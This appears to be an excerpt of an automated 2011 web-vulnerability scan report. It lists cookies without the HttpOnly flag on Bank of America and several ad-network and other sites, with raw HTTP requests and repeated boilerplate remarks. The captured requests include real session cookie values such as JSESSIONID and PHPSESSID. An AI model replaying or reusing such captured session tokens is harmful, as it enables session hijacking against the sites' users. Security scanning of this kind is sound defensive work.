GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="EN"> <head> <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css" rel="styles ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /military HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /military/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=I=1&TS=1303826034
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /collect/?fmt=gif&url=response.firstdata.com&pid=1009 HTTP/1.1 Host: www.bizographics.com Proxy-Connection: keep-alive Referer: http://response.firstdata.com/?elqPURLPage=15 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=xpA78UaP5mY4YDpjM3cPh9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQFMYVM1J6enaj5XcunNcMDa7Re6IGD4lDGXtlaauKpHAd6xyMUDLG6HwNFYBuERpuip6J7BXd0x4sE9pUJC88Pe5yXHOj6bWJ8aODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw7c8rqipRMEYPOEhN8UMj4XYITcDlTehMXv6yypp6AmSipxPddYpylx7e4dpBDiij57vFe2oBf0ipmt6RRlAydgIWkGDyfisfDPHdMovfSDMpZP3LipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; BizoNetworkPartnerIndex=3
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Content-Language: en-US Date: Mon, 25 Apr 2011 23:44:11 GMT Location: http://ad.bizo.com/pixel?id=1258184&t=2 P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/ Set-Cookie: BizoData=BiimYs2dCnnkYokR5LALIdNQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRwyz8QeClGZaj5XcunNcMDa7Re6IGD4lOgzJypdKRL6Ad6xyMUDLG7Ls3W4E4jF1liisFhqr12LzsIxjybldL0GQrQ8ohAZLAMaODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw8axzZEGMHjfOEhN8UMj4XaoP57SMbkTjDOsfxe0q98KOVcdy2PXFii1PU6e2biipKbWwErwOA1uvGg1WadM37je21ySjBqI9OZvePk1jYeANuipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/ Content-Length: 0 Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cart/ HTTP/1.1 Host: www.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/login.aspx?sgt=1 HTTP/1.1 Host: www.fs.ustrust.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/contactUs.do HTTP/1.1 Host: www.is3.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /download/pchealthadvisor/revenuewire/ HTTP/1.1 Host: www.paretologic.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://dl3.paretologic.com/webair/dl3/downloads/pchealthadvisor/en/ParetoLogic%20PC%20Health%2 ...[SNIP]...
15. Cookie without HttpOnly flag setpreviousnext There are 164 instances of this issue:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signup.php HTTP/1.1 Host: account.snap.com Connection: keep-alive Referer: http://www.snap.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289667 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4F7536F996FEB4760F63E1BC935B1B5E; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 26 Apr 2011 14:21:08 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /about.htm HTTP/1.1 Host: afreshbunch.com Proxy-Connection: keep-alive Referer: http://www.afreshbunch.com/?page=login User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.5.10.1303778640
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dsatserving2/servlet/BannerServer?tagid=1139&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&adh=40&adw=590 HTTP/1.1 Host: contextlinks.netseer.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fe0b24b3b7c7dd3,1303674392792,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862,11:EXTERNAL:1303614599357"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>NetSeer Advertisement</title> <meta http-equiv="pragma" content="no-cache ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&uid=ZC45X9Axu6NOUFfX_289667&xy=0%2C0&wh=120%2C600&vchannel=69114&cid=166308&iad=1303827681130-85943930735811580&cookieenabled=1&screenwh=1920%2C1200&adwh=120%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ikano.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IKANO.com - Inter ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: learn.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>Personal F ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card_d.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&fl=null&size=320x79 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=anqbi8c98lhrc9t5dv43unlak6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
